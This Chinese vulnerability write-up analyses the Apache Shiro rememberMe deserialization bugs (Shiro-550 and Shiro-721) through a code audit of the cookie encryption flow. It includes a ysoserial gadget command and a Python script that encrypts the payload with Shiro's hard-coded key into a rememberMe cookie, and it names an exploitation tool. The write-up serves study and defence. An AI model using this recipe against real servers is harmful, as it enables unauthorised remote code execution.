Shiro反序列化漏洞研究
漏洞介绍
Shiro-550
shiro框架在登录页面有rememberMe的功能,这个功能的实现是将标识用户身份的对象Principals
通过序列化、加密、base64编码之后放到cookie,方便下次访问的时候再通过反序列化辨别用户身份。而因为加密使用了硬编码的秘钥,导致攻击者可以构造恶意的对象进行序列化后加密、编码然后传到后台触发反序列化从而执行任意命令。
Shiro-721
同样的功能,由于shiro加密采用AES-128-CBC模式进行加密,同时解密的IV值是可控的。在这些前提下,就可以同Padding Oracle Attack方式攻击爆破出解密的中间值,然后利用IV可控的机制,在不知道秘钥的情况下控制服务端解密出任意的明文。由此,任然可以构造恶意对象达到反序列化执行任意命令的目标。
原作者分析
注:Shiro-550和Shiro-721是apache的问题编号,详情参考
环境信息
windows-10、tomcat-9.0.53、shiro-1.2.4、IDEA 2021 社区版
源码下载
https://github.com/apache/shiro.git,选择1.2.4版本下载
idea中设置tomcat运行环境
-
官网下载 tomcat-9.0.53,解压到任意目录下,添加环境变量(目录替换成自己的)
TOMCAT_HOME:D:\Program Files\apache-tomcat-9.0.53
CATALINA_HOME:D:\Program Files\apache-tomcat-9.0.53
PATH:D:\Program Files\apache-tomcat-9.0.53\bin;D:\Program Files\apache-tomcat-9.0.53\lib
-
IDEA安装Smart Tomcat插件,并设置 tomcat 服务器
添加Tomcat Server并运行sample/web项目
修改pom文件中,jstl版本为1.2
run–>edit configuration
访问Apache Shiro Quickstart,和上面配置中的端口和路径对应
代码审计
在登录的时候点记住密码会加密生成键为rememberme的cookie,下面跟踪加密的代码流程
-
断点下在 RememberMeManager#onSuccessfulLogin
-
进到 RememberMe 的分支
-
继续跟进到
AbstractRememberMeManager#rememberIdentity
函数,可以看到AbstractRememberMeManager#convertPrincipalsToBytes
生成序列化字节,跟进去之后就可以看到对序列化字节加密的地方 -
跟进到加密函数中,先是得加密算法实例,可以看到是AES CBC模式。然后跟进看下传进去的秘钥
-
这边秘钥的最终来源需要手动去跟踪,可以发现通过 set 方法将 DEFAULT_CIPHER_KEY_BYTES 传了过去,然后 DEFAULT_CIPHER_KEY_BYTES 就是硬编码在代码中
-
秘钥硬编码跟完了,继续回到分析加密的过程
-
可以发现这边传入一个 iv 值,这样就存在一个问题:key是硬编码的,但 iv 值是随机的,这样怎么构造加密后的 payload? 继续跟进加密函数中看下
重点看下这边通过 arraycopy 将 iv 值和密文拼接在一起了
-
跟进完加密算法,回到
AbstractRememberMeManager#rememberIdentity
函数,跟进到CookieRememberMeManager#rememberSerializedIdentity
函数,可以看到对加密后的数据进行base64编码最后总结一下流程就是:序列化——加密——base64编码
分析解密流程
-
断点下在
org.apache.shiro.mgt.DefaultSecurityManager#getRememberedIdentity
,然后对页面发起带 cookie 的请求抓包,删除 cookie 中 JSESSIONID(这样才能触发rememberMe的反序列化流程) -
跟进
getRememberedPrincipals
函数,先获取到 rememberMe 字段的值,然后进行了反序列化操作,分别跟进一下 -
先跟进
getRememberedSerializedIdentity
函数,这个函数就是获取了 cookie 中 rememberMe字段的值,并进行了base64解码 -
再跟进
org.apache.shiro.mgt.AbstractRememberMeManager#convertBytesToPrincipals
,主要就是解密,然后调用反序列化函数生成对象 -
反序列化就是正常操作,主要看下解密的过程,最后跟进到
org.apache.shiro.crypto.JcaCipherService#decrypt(byte[], byte[])
重点就在于这边解答了上面的疑问,可以看到先从传进来的密文中取出了 iv 值,然后再对真正的密文进行解密。也就是说 iv 值参与加密也不影响,都是用户可控的!
总结一下解密流程就是:base64解码——AES 解密——反序列化
漏洞利用
-
明白了整个流程,就可以直接人为构造一个 rememberMe 序列化字符串了。
利用
ysoserial-master
生成序列化的POCjava -jar ysoserial-master.jar CommonsCollections2 calc > 1.txt
python实现加密和编码:
import base64 from Cryptodome.Cipher import AES# 这是密钥 key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") # key iv = b"1"*16 # 从文件读取序列化字符串 with open('1.txt', 'rb') as f:text = f.read()BS = AES.block_size # 创建加密实例 cipher = AES.new(key, AES.MODE_CBC, iv) # 填充 x = BS - (len(text) % BS) text = text + chr(x).encode() * xencrypto_text = cipher.encrypt(text) # 把IV值拼接在前面 encrypto_text = iv + encrypto_text result = base64.b64encode(encrypto_text) print(result)
用生成的加密字符串放到cookie中访问shiro站点就可以触发
-
shrio反序列化检测和利用工具 ShiroExploit-Deprecated
Shiro-550:
Shiro-721:
通过工具利用padding oracle方法进行爆破,生成任意对象。
为什么需要登录才能利用
这边根据试验猜测是因为shiro不会因为padding不正确而返回500错误,所以没有办法根据状态判断填充是否正确,也就没法生成任意数据。
输入任意值cookie,返回依旧是200
Shiro-721破解过程和原理
- 通过wireshark将工具爆破的包抓下来,将里面cookie捞出来和正常cookie对比一下,发现正好是在原数据后加了16字节数据块的base64编码(是编码之后加到原来的编码数据后,不是加之后再进行编码,这样不影响原有数据的编码)。
-
另外就是,在原数据后面增加任意数据不会影响原数据的反序列化。因为序列化二进制数据前部分数据是对类和属性的描述,后部分数据是值。所以根据前面的描述就能确定数据的结尾在哪,后面添加的脏数据也不会影响反序列化的结果。java序列化数据格式
工具最终跑出来的cookie如下,就是在原有的cookie的基础上加上爆破出来的数据。
- 所以,原理就是每次在原有的cookie上爆破一个块,根据登录状态来进行判断填充是否正确,构造任意数据。
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
相关文章
- 1M到底是等于多少K?
0x00 M和K 挺有意思,一个基础问题,很多学了较久的计算机的同学还在纠结,先放常见的两个答案。 1M 1024K1M 1000K 大多数同学都会认为是1024,但是实际上在提出这个问题时,是需要带上场景的。比如 当描述速率时&am…...
2024/5/5 22:22:47 - 旅行青蛙前期怎么玩 新手入门必看攻略
旅行青蛙前期怎么玩?有什么新手攻略吗?相信大家最近都被这款游戏刷屏了,感觉全世界都在玩,很多玩家都不小心入坑了,下面就和小编一起去看看这游戏要怎么玩吧。 旅行青蛙前期怎么玩? 主角是一只可爱的小青蛙,你可以给它取名字。 通过收集三叶草去商城买东西,有食物、幸运…...
2024/4/25 2:54:51 - Spring学习之—环境搭建
1. pom文件添加jar包依赖 <dependencies><!--依赖于junit单元测试--><dependency><groupId>junit</groupId><artifactId>junit</artifactId><version>4.11</version><scope>test</scope></dependency>…...
2024/5/6 4:47:30 - Ad hoc Test
“Ad-Hoc” 原意是指 “特定的,一次性的”,这里专指“随机的,自由的”测试。在软件测试中除了根据测试样例和测试说明书进行测试外,还需要进行随机测试(Ad-hoc testing),主要是根据测试者的经验对软件进行功能和性能抽…...
2024/4/22 21:32:31 - Unity学习shader笔记[四十九]简单流光思路
轴平行流光 简单单坐标轴方向的流光的思路是 C#控制一个y值,先获取物体的所有mesh的bounds, 如果物体的坐标系原点在底部,y值是从物体的y值变换到y值加bounds高度,如此循环,y值传入shader 在shader中,判…...
2024/4/15 10:29:54 - Android 定位系统(GPS)开发基础
前言 欢迎大家我分享和推荐好用的代码段~~声明 欢迎转载,但请保留文章原始出处: CSDN:http://www.csdn.net雨季o莫忧离:http://blog.csdn.net/luckkof 正文全球定位系统(Global Positioning System,GPS),是一个中距离圆型轨道卫星导航系统,可…...
2024/4/25 15:06:02 - golang使用三方库json_iterator序列化和反序列化
文章目录简介序列化struct->jsonmap->json反序列化json->structjson->map简介 golang 中 json 序列化和反序列化除了使用自带的 encoding/json 库之外,还可以使用第三方的 “github.com/json-iterator/go” 库,json_iterator 工具号称是最快…...
2024/4/15 22:50:12 - IPv4路由别名fib_alias
fib_alias用于连接tries树节点和基础的fib_info结构。 在新增路由表项时,如果没有合适的fib_alias可用,可用表示新增表项和已有fib_alias的tos,priority,以及type,scope相同,并且使用相同的fib_info&#…...
2024/5/6 0:16:33 - 决策树挑西瓜
一、决策树 优点: 1.决策树易于理解和实现,人们在在学习过程中不需要使用者了解很多的背景知识,这同时是它的能够直接体现数据的特点,只要通过解释后都有能力去理解决策树所表达的意义。 2.对于决策树,数据的准备往…...
2024/4/18 9:57:09 - CCPC2018桂林D. Bits Reverse —— 思维 + 贪心
第一签到题 题意: T组输入,每组输入包含两个数字x和y(long long int)。对x有一种操作,可以将 x的二进制 任意相邻的三个位逆置。 问最少进行多少次操作,可以使得x等于y,不可能则输出-1 思路…...
2024/4/19 7:46:01 - Zbar源码解析|2021SC@SDUSC
2021SCSDUSC 首先说明我的测试场景是“识别打印在纸上的二维码”,在扫描结果中寻找二维码并进行识别,而不是直接让摄像头对着二维码扫描。 测了大概几千张图片,两个库的准确率差不多(由于图片场景的多样性,确切…...
2024/5/6 8:46:33 - 深度学习 Normalization
深度学习 Normalization前言NormalizationWhy:为什么需要normalization?What:有什么normalization?Batch NormalizationLayer NormalizationInstance NormalizationGroup Normalization其他How:怎么实现normalizationB…...
2024/5/6 5:03:51 - 创建spring boot新项目
父项目 创建spring项目 选择Maven POM项目 创建成功后就是只有pom.xml的父项目 创建子项目 创建maven项目 创建自定义的包名 手动添加SpringApplication和application.yml文件 这样一个有父项目和子项目的工程就创建了 ——————————————————————————…...
2024/4/15 14:11:33 - Docker容器化学习笔记(四)Dockerfile命令与构建镜像、私库搭建与镜像上传
1. Dockerfile 1.1 什么是Dockerfile Dockerfile是由一系列命令和参数构成的脚本,这些命令应用于基础镜像并最终创建一个新的镜像。 对于开发人员:可以为开发团队提供一个完全一致的环境。对于测试人员:可以直接拿开发所构建的镜像或Docke…...
2024/4/28 15:48:00 - C/C++之重读1
计算机是如何区分有符号数和无符号数的 其实CPU是不需要知道数字是有符号和无符号的,他只关心外部使用的是什么指令。内部都是使用补码。 float/double转换为二进制 这两种类型根据IEEE规定,float使用符号位(1bit),阶码位(8bit),尾码(23bit), double使用…...
2024/4/17 10:15:49 - LInux环境下运行C语言
gcc -c demo.c 编译 ->生成demo.ogcc test.o -o test ->生成可执行文件demo ./demo 执行gcc demo.c -o demo->生成可执行文件demo...
2024/4/11 15:50:16 - ThingJS如何收费的?
作为商用平台,使用ThingJS是需要收费的,这个是重点,要是使用ThingJS去做项目,钱也花了,项目都制作不出来,岂不是亏大了?那就不得不向大家介绍一下ThingJS了。 ThingJS如何收费的? 第…...
2024/4/6 12:09:44 - kubernetes监控---监控集群资源消耗
安装Metrics-servercAdvisor监控集群资源消耗 cAdvisor提供数据,但数据没有给top提供支持 # kubectl top node(pod)命令不可用 安装Metrics-server 提供命令支持 # wget https://github.com/kubernetes-sigs/metrics-server/releases/download/v0.3.7/components.y…...
2024/4/15 14:11:23 - 7-81 编程团体赛 (20 分)
7-81 编程团体赛 (20 分) 编程团体赛的规则为:每个参赛队由若干队员组成;所有队员独立比赛;参赛队的成绩为所有队员的成绩和;成绩最高的队获胜。 现给定所有队员的比赛成绩,请你编写程序找出冠军队。 输入格式&…...
2024/4/15 14:11:13 - SpringMVC基础学习之简单回顾MVC架构和Servlet的使用
前言: 小伙伴们,大家好,我是狂奔の蜗牛rz,当然你们可以叫我蜗牛君,我是一个学习Java半年多时间的小菜鸟,同时还有一个伟大的梦想,那就是有朝一日,成为一个优秀的Java架构师。 这个Sp…...
2024/4/6 12:09:41
最新文章
- 设计模式学习(八)——《大话设计模式》
设计模式学习(八)——《大话设计模式》 单一职责原则 单一职责原则(Single Responsibility Principle, SRP)是软件开发中 SOLID 原则之一,由罗伯特C马丁(Robert C. Martin)提出。它指的是一个类…...
2024/5/6 10:27:09 - 梯度消失和梯度爆炸的一些处理方法
在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言,在此感激不尽。 权重和梯度的更新公式如下: w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...
2024/5/6 9:38:23 - 2024认证杯数学建模B题思路模型代码
目录 2024认证杯数学建模B题思路模型代码:4.11开赛后第一时间更新,获取见文末名片 第十三届“认证杯”数学中国数学建模比赛赛后体会 2024认证杯数学建模B题思路模型代码:4.11开赛后第一时间更新,获取见文末名片 第十三届“认证杯”数学中国数学建模比…...
2024/5/6 8:43:07 - Oracle备份和还原的几种方式
1、使用数据泵方式 exp demo/demoorcl buffer1024 filed:\back.dmp fully demo:用户名、密码 buffer: 缓存大小 file: 具体的备份文件地址 full: 是否导出全部文件 ignore: 忽略错误,如果表已经存在,则也是覆盖 exp demo/de…...
2024/4/30 4:18:57 - xv6项目开源—05
xv6项目开源—05.md 理论: 1、设备驱动程序在两种环境中执行代码:上半部分在进程的内核线程中运行,下半部分在中断时执行。上半部分通过系统调用进行调用,如希望设备执行I/O操作的read和write。这段代码可能会要求硬件执行操作&…...
2024/5/2 2:36:53 - 【外汇早评】美通胀数据走低,美元调整
原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...
2024/5/4 23:54:56 - 【原油贵金属周评】原油多头拥挤,价格调整
原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...
2024/5/4 23:54:56 - 【外汇周评】靓丽非农不及疲软通胀影响
原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...
2024/5/4 23:54:56 - 【原油贵金属早评】库存继续增加,油价收跌
原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...
2024/5/6 9:21:00 - 【外汇早评】日本央行会议纪要不改日元强势
原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...
2024/5/4 23:54:56 - 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响
原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...
2024/5/4 23:55:05 - 【外汇早评】美欲与伊朗重谈协议
原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...
2024/5/4 23:54:56 - 【原油贵金属早评】波动率飙升,市场情绪动荡
原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...
2024/5/4 23:55:16 - 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试
原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...
2024/5/4 23:54:56 - 【原油贵金属早评】市场情绪继续恶化,黄金上破
原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...
2024/5/6 1:40:42 - 【外汇早评】美伊僵持,风险情绪继续升温
原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...
2024/5/4 23:54:56 - 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势
原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...
2024/5/4 23:55:17 - 氧生福地 玩美北湖(上)——为时光守候两千年
原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...
2024/5/4 23:55:06 - 氧生福地 玩美北湖(中)——永春梯田里的美与鲜
原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...
2024/5/4 23:54:56 - 氧生福地 玩美北湖(下)——奔跑吧骚年!
原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...
2024/5/4 23:55:06 - 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!
原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...
2024/5/5 8:13:33 - 「发现」铁皮石斛仙草之神奇功效用于医用面膜
原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...
2024/5/4 23:55:16 - 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者
原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...
2024/5/4 23:54:58 - 广州械字号面膜生产厂家OEM/ODM4项须知!
原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...
2024/5/4 23:55:01 - 械字号医用眼膜缓解用眼过度到底有无作用?
原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...
2024/5/4 23:54:56 - 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...
解析如下:1、长按电脑电源键直至关机,然后再按一次电源健重启电脑,按F8健进入安全模式2、安全模式下进入Windows系统桌面后,按住“winR”打开运行窗口,输入“services.msc”打开服务设置3、在服务界面,选中…...
2022/11/19 21:17:18 - 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。
%读入6幅图像(每一幅图像的大小是564*564) f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...
2022/11/19 21:17:16 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...
win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面,在等待界面中我们需要等待操作结束才能关机,虽然这比较麻烦,但是对系统进行配置和升级…...
2022/11/19 21:17:15 - 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...
有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows,请勿关闭计算机”的提示,要过很久才能进入系统,有的用户甚至几个小时也无法进入,下面就教大家这个问题的解决方法。第一种方法:我们首先在左下角的“开始…...
2022/11/19 21:17:14 - win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...
置信有很多用户都跟小编一样遇到过这样的问题,电脑时发现开机屏幕显现“正在配置Windows Update,请勿关机”(如下图所示),而且还需求等大约5分钟才干进入系统。这是怎样回事呢?一切都是正常操作的,为什么开时机呈现“正…...
2022/11/19 21:17:13 - 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...
Win7系统开机启动时总是出现“配置Windows请勿关机”的提示,没过几秒后电脑自动重启,每次开机都这样无法进入系统,此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一:开机按下F8,在出现的Windows高级启动选…...
2022/11/19 21:17:12 - 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...
有不少windows10系统用户反映说碰到这样一个情况,就是电脑提示正在准备windows请勿关闭计算机,碰到这样的问题该怎么解决呢,现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法:1、2、依次…...
2022/11/19 21:17:11 - 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...
今天和大家分享一下win7系统重装了Win7旗舰版系统后,每次关机的时候桌面上都会显示一个“配置Windows Update的界面,提示请勿关闭计算机”,每次停留好几分钟才能正常关机,导致什么情况引起的呢?出现配置Windows Update…...
2022/11/19 21:17:10 - 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...
只能是等着,别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚,只能是考虑备份数据后重装系统了。解决来方案一:管理员运行cmd:net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...
2022/11/19 21:17:09 - 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?
原标题:电脑提示“配置Windows Update请勿关闭计算机”怎么办?win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢?一般的方…...
2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57